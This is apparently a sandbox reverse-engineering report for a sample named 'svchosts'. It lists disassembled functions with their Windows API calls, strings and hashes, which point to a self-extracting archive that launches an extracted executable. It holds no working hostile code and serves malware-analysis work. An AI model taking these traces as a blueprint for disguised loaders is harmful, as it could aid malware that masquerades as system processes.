Instruction Fuzzy Hash: 7642D471D64245AFEB22AFA4AC8DFBE7B7CAB13740F000156F605A6092CF744D64CB61

Function 002A00CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 002A00E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002A00F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002A0127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002A03D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A03F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002A0402
ReadFile.KERNEL32(00000000,?,00007FFE,002C3BA4,00000000), ref: 002A0421
CloseHandle.KERNEL32(00000000), ref: 002A0479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002A048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 002A04E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 002A0510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 002A054A

Part of subcall function 002A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002A00A0
Part of subcall function 002A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0029EB86,Crypt32.dll,00000000,0029EC0A,?,?,0029EBEC,?,?,?), ref: 002A00C2

_swprintf.LIBCMT ref: 002A05BE
_swprintf.LIBCMT ref: 002A060A

Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D

AllocConsole.KERNEL32 ref: 002A0612
GetCurrentProcessId.KERNEL32 ref: 002A061C
AttachConsole.KERNEL32(00000000), ref: 002A0623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 002A0649
WriteConsoleW.KERNEL32(00000000), ref: 002A0650
Sleep.KERNEL32(00002710), ref: 002A065B
FreeConsole.KERNEL32 ref: 002A0661
ExitProcess.KERNEL32 ref: 002A0669

Strings

T?,, xrefs: 002A02C0
x=,, xrefs: 002A0204
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 002A05F8
T;,, xrefs: 002A0154
SetDllDirectoryW, xrefs: 002A00F0
<,, xrefs: 002A018C
@>,, xrefs: 002A0247
>,, xrefs: 002A0289
p>,, xrefs: 002A025D
`=,, xrefs: 002A01FC
p?,, xrefs: 002A02CB
DXGIDebug.dll, xrefs: 002A0169, 002A04D3
p@,, xrefs: 002A0344
D=,, xrefs: 002A01F4
?,, xrefs: 002A0302
@@,, xrefs: 002A032E
(@,, xrefs: 002A0323
SetDefaultDllDirectories, xrefs: 002A0121
\A,, xrefs: 002A03A7
0A,, xrefs: 002A0391
kernel32, xrefs: 002A00DD
X@,, xrefs: 002A0339
dwmapi.dll, xrefs: 002A0581
(>,, xrefs: 002A023C
8<,, xrefs: 002A0194
P<,, xrefs: 002A019C
4=,, xrefs: 002A01EC
<?,, xrefs: 002A02B5
?,, xrefs: 002A02AA
DA,, xrefs: 002A039C
X>,, xrefs: 002A0252
|<,, xrefs: 002A01AC
uxtheme.dll, xrefs: 002A058B
l<,, xrefs: 002A055C

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: <,$ ?,$(>,$(@,$0A,$4=,$8<,$<?,$@>,$@@,$D=,$DA,$DXGIDebug.dll$P<,$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;,$T?,$X>,$X@,$\A,$`=,$dwmapi.dll$kernel32$l<,$p>,$p?,$p@,$uxtheme.dll$x=,$|<,$>,$?,
API String ID: 1201351596-931991055
Opcode ID: 47b2191eb45311c4777dee64c84d74417eae20ae0b024d013530b3b2bdef04ab
Instruction ID: 5b253f29a90baefc42b7d87780d065f9c8a748087269448d147a1bec2dfe90de
Opcode Fuzzy Hash: 47b2191eb45311c4777dee64c84d74417eae20ae0b024d013530b3b2bdef04ab
Instruction Fuzzy Hash: 02D161B15683849BD720EF50D849FDFBBE8BF85704F408E1DF58996140DBB086688F62

Function 002ABDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 002ABDFA

Part of subcall function 002AAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 002AAAFE

SetWindowTextW.USER32(?,?), ref: 002AC127
_wcsrchr.LIBVCRUNTIME ref: 002AC2B1
GetDlgItem.USER32(?,00000066), ref: 002AC2EC
SetWindowTextW.USER32(00000000,?), ref: 002AC2FC
SendMessageW.USER32(00000000,00000143,00000000,002DA472), ref: 002AC30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002AC335

Strings

%s.%d.tmp, xrefs: 002ABFF6
ProgramFilesDir, xrefs: 002AC1FB
<br>, xrefs: 002AC08A
Software\Microsoft\Windows\CurrentVersion, xrefs: 002AC1D0

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 23fb06ca6b4f0a3cd371a7e2b629731956545bb04801faf20109dff8a430ed8d
Instruction ID: ea8b10efd966c0162a2e35ed8fcc9fe5502b1015df408b6a96a5376a25bb6a92
Opcode Fuzzy Hash: 23fb06ca6b4f0a3cd371a7e2b629731956545bb04801faf20109dff8a430ed8d
Instruction Fuzzy Hash: DAE15F76D14219ABDF25DFA0DC49EEB77BCAF0A350F5040A6F909E2051EB709A94CF50

Function 0029D341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0029D346
_wcschr.LIBVCRUNTIME ref: 0029D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0029D328,?), ref: 0029D382
__fprintf_l.LIBCMT ref: 0029D873

Part of subcall function 002A137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0029B652,00000000,?,?,?,00010450), ref: 002A1396

Strings

$%s:, xrefs: 0029D856
$9,, xrefs: 0029D6AF
, xrefs: 0029D67A
a, xrefs: 0029D4EF
*messages***, xrefs: 0029D49A
@%s:, xrefs: 0029D85D, 0029D869
,, xrefs: 0029D8AE
R, xrefs: 0029D4E5
RTL, xrefs: 0029D838
*messages***, xrefs: 0029D4D3

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$$9,$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-2171448403
Opcode ID: 1d26697f23377302db8dd78727e9c93453563fb9124e802d3d065f81c8c55bd9
Instruction ID: 571ed2931ced273ec581819b5dc568d5a2aca17bb709daacf9b9cc82e83e3dec
Opcode Fuzzy Hash: 1d26697f23377302db8dd78727e9c93453563fb9124e802d3d065f81c8c55bd9
Instruction Fuzzy Hash: 7012B1B192021A9ADF24EFA4DC81BEEB7B9FF05300F50456EF505A7181EB709A60DF64

Function 002ACB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002AAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002AAC85
Part of subcall function 002AAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002AAC96
Part of subcall function 002AAC74: IsDialogMessageW.USER32(00010450,?), ref: 002AACAA
Part of subcall function 002AAC74: TranslateMessage.USER32(?), ref: 002AACB8
Part of subcall function 002AAC74: DispatchMessageW.USER32(?), ref: 002AACC2

GetDlgItem.USER32(00000068,002EECB0), ref: 002ACB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,002AA632,00000001,?,?,002AAECB,002C4F88,002EECB0), ref: 002ACB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002ACBA1
SendMessageW.USER32(00000000,000000C2,00000000,002C35B4), ref: 002ACBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ACBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 002ACBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ACC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 002ACC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ACC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ACC67
SendMessageW.USER32(00000000,000000C2,00000000,002C431C), ref: 002ACC76

Strings

\, xrefs: 002ACBCF

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 6e9cdc37db7674ff448359aa093b8da507ec82485c39a4ae0f2b60d0c6c7fd64
Instruction ID: 402ca26f024e41614ce4c2ec1128012af476548af1ea233c37c50ed5dea28495
Opcode Fuzzy Hash: 6e9cdc37db7674ff448359aa093b8da507ec82485c39a4ae0f2b60d0c6c7fd64
Instruction Fuzzy Hash: 59319C72146342FBE301DF20BC4AFAB7FACEB92764F000519F65196191DB654908CB66

Function 002ACE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 002ACF54
ShowWindow.USER32(?,00000000), ref: 002ACF93
GetExitCodeProcess.KERNEL32(?,?), ref: 002ACFCF
CloseHandle.KERNEL32(?), ref: 002ACFF5
ShowWindow.USER32(?,00000001), ref: 002AD084

Part of subcall function 002A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0029BB05,00000000,.exe,?,?,00000800,?,?,002A85DF,?), ref: 002A17C2

Strings

, xrefs: 002ACEA2
.inf, xrefs: 002ACF10
.exe, xrefs: 002ACFFF

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 420439deb52e86b559cd0887892baf7d1af0ae63adaf2aed6566217254661ea9
Instruction ID: 111655944fa8ee1bbf698a678f0b060ef463586b0ec4cec0cbe9f1f10a1865d8
Opcode Fuzzy Hash: 420439deb52e86b559cd0887892baf7d1af0ae63adaf2aed6566217254661ea9
Instruction Fuzzy Hash: 396115704243829FDB319F24D904AABBBF5AF93340F14481EF4C697551DFB189A5CB92

Function 002BA058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002B4E35,002B4E35,?,?,?,002BA2A9,00000001,00000001,3FE85006), ref: 002BA0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002BA2A9,00000001,00000001,3FE85006,?,?,?), ref: 002BA138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002BA232
__freea.LIBCMT ref: 002BA23F

Part of subcall function 002B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002BC13D,00000000,?,002B67E2,?,00000008,?,002B89AD,?,?,?), ref: 002B854A

__freea.LIBCMT ref: 002BA248
__freea.LIBCMT ref: 002BA26D

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: eac165d478c9d19f2f08c25a4cae3cb74f8153e6a0ab891afce3b2a977f0caf0
Instruction ID: 257a6a21208cfd79eaec0f52255d090304a2f9baf294ebd18752095c099c0d0f
Opcode Fuzzy Hash: eac165d478c9d19f2f08c25a4cae3cb74f8153e6a0ab891afce3b2a977f0caf0
Instruction Fuzzy Hash: AF51D172630206AFDB259E64CC46FFF77A9EB40790F194629FD08D6140EB75DC60CAA2

Function 002AA335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002A00A0
Part of subcall function 002A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0029EB86,Crypt32.dll,00000000,0029EC0A,?,?,0029EBEC,?,?,?), ref: 002A00C2

OleInitialize.OLE32(00000000), ref: 002AA34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002AA385
SHGetMalloc.SHELL32(002D8430), ref: 002AA38F

Strings

3To, xrefs: 002AA366
riched20.dll, xrefs: 002AA33D

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: cfca47214ef321cbcb0fec7f1bf7ef434263f9ef00fe1657b5d9a17a9c9bd8eb
Instruction ID: 81b2d68d87ec060d44a35c706cf3db62d97ffb68d469b4669b5c4ef82ef01e2c
Opcode Fuzzy Hash: cfca47214ef321cbcb0fec7f1bf7ef434263f9ef00fe1657b5d9a17a9c9bd8eb
Instruction Fuzzy Hash: 3BF062B1C0020DABCB10AF99D8499EFFBFCEF96311F00416AE814E2200CBB40609CFA1

Function 002999B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,002978AD,?,00000005,?,00000011), ref: 00299A4C
GetLastError.KERNEL32(?,?,002978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00299A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,002978AD,?,00000005,?), ref: 00299A8E
GetLastError.KERNEL32(?,?,002978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00299A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,002978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00299ADB

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: d3c8bc503937b8ea8cc8d6fa974597b653b642415aa2359d2da55a1f14e5df9f
Instruction ID: 7e76a53dd074d3cee9ab8401760f545c171f830437781dc1c3e3e6423c74ec78
Opcode Fuzzy Hash: d3c8bc503937b8ea8cc8d6fa974597b653b642415aa2359d2da55a1f14e5df9f
Instruction Fuzzy Hash: 114120715547466BEB20CE28DC0ABDABAD4EB01334F10071DF9E4921D0E7B5A9A88BA1

Function 002AA2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 002AA2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 002AA315

Part of subcall function 002A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0029BB05,00000000,.exe,?,?,00000800,?,?,002A85DF,?), ref: 002A17C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 002AA305

Strings

EDIT, xrefs: 002AA2E9, 002AA2F4, 002AA301

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 2a7405fbb90ee5bc06a08361e39bf028a1752370c5a12f196940dd9cf4759a0d
Instruction ID: 66eec73fb8da00dc35461d3b3fdf3ab8f45fcde00456c2616d5c9605803454e0
Opcode Fuzzy Hash: 2a7405fbb90ee5bc06a08361e39bf028a1752370c5a12f196940dd9cf4759a0d
Instruction Fuzzy Hash: 4CF0AE33A1161877DB305A546C09FEB776C9F57B50F040166BD05F2180DF609D65C5F6

Function 002AD287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 002AD29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002AD2D9

Strings

sfxcmd, xrefs: 002AD298
sfxpar, xrefs: 002AD2D4

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 1acf3d5413ada1def5fc58e63d206f189791ff1af3c982f05a7533e6ce1edb9d
Instruction ID: e60d558d4aedf49751d4a338da8bfc594f984a33fab285ad715f744634bde3d6
Opcode Fuzzy Hash: 1acf3d5413ada1def5fc58e63d206f189791ff1af3c982f05a7533e6ce1edb9d
Instruction Fuzzy Hash: 84F0A772820238A7CB206F909C19FBA7758AF1A741B044556FC8996142DA60DD60DAF1

Function 0029984E Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0029985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00299876
GetLastError.KERNEL32 ref: 002998A8
GetLastError.KERNEL32 ref: 002998C7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 15c67813774d2f50dba48ac363df59648baade16e4a78d2bcd9b4a4f82be8250
Instruction ID: 28c04976c48b88ee437f71c85fa9b5e5e5eaac679f586667c2450d9bde9c28aa
Opcode Fuzzy Hash: 15c67813774d2f50dba48ac363df59648baade16e4a78d2bcd9b4a4f82be8250
Instruction Fuzzy Hash: AE11A931920209EBDF209F5DD808AA937ACFF02731F10C52EF82A85680DB759EA09F51

Function 002BA4F4 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,002B3713,00000000,00000000,?,002BA49B,002B3713,00000000,00000000,00000000,?,002BA698,00000006,FlsSetValue), ref: 002BA526
GetLastError.KERNEL32(?,002BA49B,002B3713,00000000,00000000,00000000,?,002BA698,00000006,FlsSetValue,002C7348,002C7350,00000000,00000364,?,002B9077), ref: 002BA532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002BA49B,002B3713,00000000,00000000,00000000,?,002BA698,00000006,FlsSetValue,002C7348,002C7350,00000000), ref: 002BA540

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5f91b24d885c905a0c0d5a82a3c9756cbec9169e1c7b598685dc19f31defcebb
Instruction ID: 024d3306d2fb1ac04d0ce05e7bbf9c1062ddd131e0068d35b11e3e3792b5f798
Opcode Fuzzy Hash: 5f91b24d885c905a0c0d5a82a3c9756cbec9169e1c7b598685dc19f31defcebb
Instruction Fuzzy Hash: 8201F732A31223ABC7318E6CAC48FE67B98AF45BE17944520F90AD3140D771DB10C7E1

Function 002BB188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 002B8FA5: GetLastError.KERNEL32(?,002D0EE8,002B3E14,002D0EE8,?,?,002B3713,00000050,?,002D0EE8,00000200), ref: 002B8FA9
Part of subcall function 002B8FA5: _free.LIBCMT ref: 002B8FDC
